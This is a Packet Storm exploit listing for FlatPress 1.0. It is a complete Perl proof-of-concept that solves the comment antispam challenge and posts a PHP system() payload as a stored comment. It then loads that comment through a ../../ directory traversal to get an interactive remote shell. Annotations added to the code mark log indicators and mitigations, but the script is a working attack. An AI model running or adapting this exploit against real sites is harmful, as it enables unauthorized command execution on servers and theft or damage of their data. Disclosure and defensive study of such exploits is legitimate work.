Flatpress 1.0 Traversal / Command Execution

2013-11-06T00:00:00
ID PACKETSTORM:123925
Type packetstorm
Reporter Wireghoul
Modified 2013-11-06T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
# Exploit Title: Flatpress remote code execution PoC NULLday  
# Google Dork: This site is powered by FlatPress.  
# Date: 17/10/2013  
# Exploit Author: Wireghoul  
# Vendor Homepage: http://flatpress.org/home/  
# Software Link: http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2  
# Version: v1.0  
#  
# Blended threat, executes code injected into comment  
# by loading comment as a page through directory traversal  
# Requires the inlinePHP plugin to be enabled.  
# Written by @Wireghoul - justanotherhacker.com  
#  
# This is for my peeps and the freaks in the front row -- Hilltop Hoods: Nosebleed section  
  
use strict;  
use warnings;  
use LWP::UserAgent;  
  
&banner;  
&usage if (!$ARGV[0]);  
my $injid = 'Spl0ited'.int(rand(9999));  
my $ua = LWP::UserAgent->new;  
$ua->timeout(10);  
$ua->env_proxy;  
$ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });  
  
# Prints the tool's two-line banner to STDOUT. No arguments; return value unused.
sub banner {
print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
print "=======================[ justanotherhacker.com]==\n";
}
  
# Prints the usage line (the single argument is the target base URL) and exits the
# process with status 0. Called at start-up when $ARGV[0] is missing.
sub usage {
print "Usage: $0 <url>\n";
exit;
}
  
# Step 1: presence probe. The first request this tool makes is a GET for
# fp-plugins/inlinephp/plugin.inlinephp.php; a non-success status only changes the
# message, it does not stop the run. That path in access logs is the reconnaissance
# footprint of this tool.
my $response =
$ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
if (!$response->is_success) {
print "[-] Inline PHP plugin not found at
$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
} else {
print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
}
# Prepare for exploitation, find entry + comment location
# Step 2: fetch the front page and take the first link matching
# "x=entry:entry...;comments:1#comments" as the comment page to work with.
$response = $ua->get($ARGV[0]);
if ($response->is_success) {
if ($response->decoded_content =~
/(http.*?x=entry:entry.*?;comments:1#comments)/) {
my $cmntlink = $1;
print "[+] Found comment link: $cmntlink\n";
# The antispam challenge is plain addition ("<strong>N plus M ? (*)"). Any other form is
# not solved: the loop re-fetches $cmntlink until an addition challenge is served, with no
# retry cap. Repeated GETs of one comment page from a single client are the footprint here.
my $aaspam = 0; # Can't be bothered solving easy captchas, just reload page until we get one we like
while ($aaspam == 0) {
$response = $ua->get($cmntlink);
if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \?
\(\*\)/) {
$aaspam = $1+$2;   # sum is submitted below as the 'aaspam' form field
print "[+] Defeated antispam $1 + $2 = $aaspam\n";
} else {
$response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
print "[*] Unknown antispam: $1 ... retrying\n";
}
}
# Post a comment
# Step 3: the stored payload. The comment body is a PHP system() call wrapped in
# [exec]...[/exec] markup, bracketed by the literal SHELL / LLEHS markers used later to cut
# output out of the response. Per the file header, only an enabled inlinePHP plugin turns
# that markup into code; disabling/removing that plugin removes the execution sink, and a
# stored comment containing "[exec]" or "SHELL" is the at-rest indicator.
$response = $ua->post(
$cmntlink."form",
Content => {
'name' => $injid,   # the Spl0ited<n> marker, used below to find this comment again
'email' => '',
'url' => '',
'aaspam' => $aaspam,
'content' =>
"SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
'submit' => 'Add',
}
);
$response = $ua->get($cmntlink);
# Find link to injected content, then execute pseudo shell in loop
my @cmnts = split (/<li id="comment/, $response->decoded_content);
my @injected = grep /$injid/, @cmnts;
if ($injected[0] =~ /$injid/) {
print "[+] Injection ($injid) successful\n";
# Step 4: the traversal. The three two-digit groups and the entry/comment ids from the
# comment permalink (presumably year/month/day-N) are rebuilt into a path under content/
# and passed as the "page" parameter with a leading ../../, so the stored comment file is
# rendered as a page (which, per the header, is where the inlinePHP markup is evaluated).
# "page=../" in a request is the on-the-wire indicator of this step; rejecting or
# canonicalising "page" values that contain ".." server-side closes it.
$injected[0] =~
m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
my
$shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
print "[*] Dropping into shell, type exit to exit\n";
my $line='';
# Step 5: interactive loop. Each STDIN line becomes one GET of $shell with a cmd= query
# parameter; the response is expected to carry the output between SHELL and LLEHS, and
# "<br />" tags are stripped before printing. Requests carrying both "page=../" and "cmd="
# are the per-command footprint.
while (1) {
print '$';
$line=<STDIN>;
if ($line =~ /^exit$/) { exit; };
my $output=$ua->get("$shell&cmd=$line");
$output->decoded_content =~ /SHELL(.*)LLEHS/ms;
my $clean = $1; $clean =~ s/<br \/>//g;
print "$clean\n";
}
} else {
print '[-] Unable to identify the injection point';
}
} else {
print "[-] Comment link not found\n";
}
} else {
# Front page fetch failed: abort with the HTTP status line.
die $response->status_line;
}
`